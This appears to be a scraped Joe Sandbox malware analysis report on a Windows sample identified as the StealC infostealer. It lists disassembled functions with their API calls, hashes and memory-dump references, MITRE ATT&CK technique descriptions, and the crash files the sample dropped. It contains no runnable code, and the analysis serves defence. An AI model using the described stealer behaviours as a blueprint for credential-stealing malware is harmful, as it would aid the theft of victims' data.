Instruction ID: 882c8ac737475a85607ce3c8175cd0d2981072378b163cafc3c4ed069844f37c
Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction Fuzzy Hash: CBF0F9B8E0A224EFD7419B65FD48B5537A6F308701F506527F609872E0E3B49484CB26

Function 02406FFA Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02406FD1
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02406FEF
CloseHandle.KERNEL32(00000000), ref: 02407000
Sleep.KERNEL32(00001770), ref: 0240700B
CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02407021
ExitProcess.KERNEL32 ref: 02407029

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
Instruction ID: bf4cb9160f76a103d7199ecddd2b1c969e789d6b3fa8a97bd063129f0d1edcf4
Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
Instruction Fuzzy Hash: 00F05E7094821AAAE720ABA0DC84F7EB77AFB44745F100A3BB513A11D0DBB055C0CE62

Function 0246EE4F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0246EE8E
__IsNonwritableInCurrentImage.LIBCMT ref: 0246EF42

Strings

csm, xrefs: 0246EF2C

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction ID: 43a8aa8f6bc5cd7788dfefd2ee9997a4355e4453e5f4478caaa75cca7324ec34
Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction Fuzzy Hash: 0C418138A00218EFCF14DFA9C888EEEBBE6AF45314F14815AE9195B391D7319915CF92

Function 0246F93A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 0246FA45

Strings

MOC, xrefs: 0246F971
RCC, xrefs: 0246F979

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction ID: 96c9e4d7570e26a7ff4a927b066cfaca83dd2bd0694842a2890b9506a40144d3
Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction Fuzzy Hash: 18417B31900109AFCF15CF98DD84AFE7BB5FF48308F16805AE94666221D736A954CF52

Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
lstrcatA.KERNEL32(?,00A70910), ref: 004152F8

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Strings

9dA, xrefs: 0041531F, 00415344, 00415322

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: 9dA
API String ID: 2699682494-3568425128
Opcode ID: d32059b2d27a57a75968c31ec2e6e01f0f2f25f3199ea4b8717440e2c91f7b81
Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
Opcode Fuzzy Hash: d32059b2d27a57a75968c31ec2e6e01f0f2f25f3199ea4b8717440e2c91f7b81
Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5

Function 023FBCB7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023FA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4

lstrlen.KERNEL32(00000000), ref: 023FBED6

Part of subcall function 02409227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02409249

StrStrA.SHLWAPI(00000000,0042143C), ref: 023FBF04
lstrlen.KERNEL32(00000000), ref: 023FBFDC
lstrlen.KERNEL32(00000000), ref: 023FBFF0

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID:
API String ID: 1440504306-0
Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
Instruction ID: 8d947cd288520c0fd42f25d8f25c18da55a190e4474b7c9f94950a73a9451ae8
Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
Instruction Fuzzy Hash: C3B103729103289BCB18FBA1DC95EEE733AAF54305F50457EE606661D0EF346A88CF61

Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

q?A, xrefs: 00413ED2

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: q?A
API String ID: 3840410801-4084695119
Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55

Function 024053F7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202

lstrcat.KERNEL32(?,00000000), ref: 02405431
lstrcat.KERNEL32(?,00421058), ref: 0240544E
lstrcat.KERNEL32(?,006D6FF8), ref: 02405462
lstrcat.KERNEL32(?,0042105C), ref: 02405474

Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404DE3
Part of subcall function 02404DC7: FindFirstFileA.KERNEL32(?,?), ref: 02404DFA

Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02404E28
Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02404E3E
Part of subcall function 02404DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02405034
Part of subcall function 02404DC7: FindClose.KERNEL32(000000FF), ref: 02405049

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
Instruction ID: 46427301e8dbd6899262a71b58c5d5600c042761b264786e1791bb2d187c4ec3
Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
Instruction Fuzzy Hash: 9921C876D00218A7CB14EB70EC85EE9333EAF54300F40465AF699561D0EE745BCC8F91

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8WOUWb5iEv.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8WOUWb5iEv.exe_80bab832ae0336fa3a173ad788cd95d652d5_ea07dd38_faf1113e-2f58-4fe5-9372-4358337c6723\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA45.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB5F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB8F.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
8WOUWb5iEv.exe

Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191
networkfileCOMMON

Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 023F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre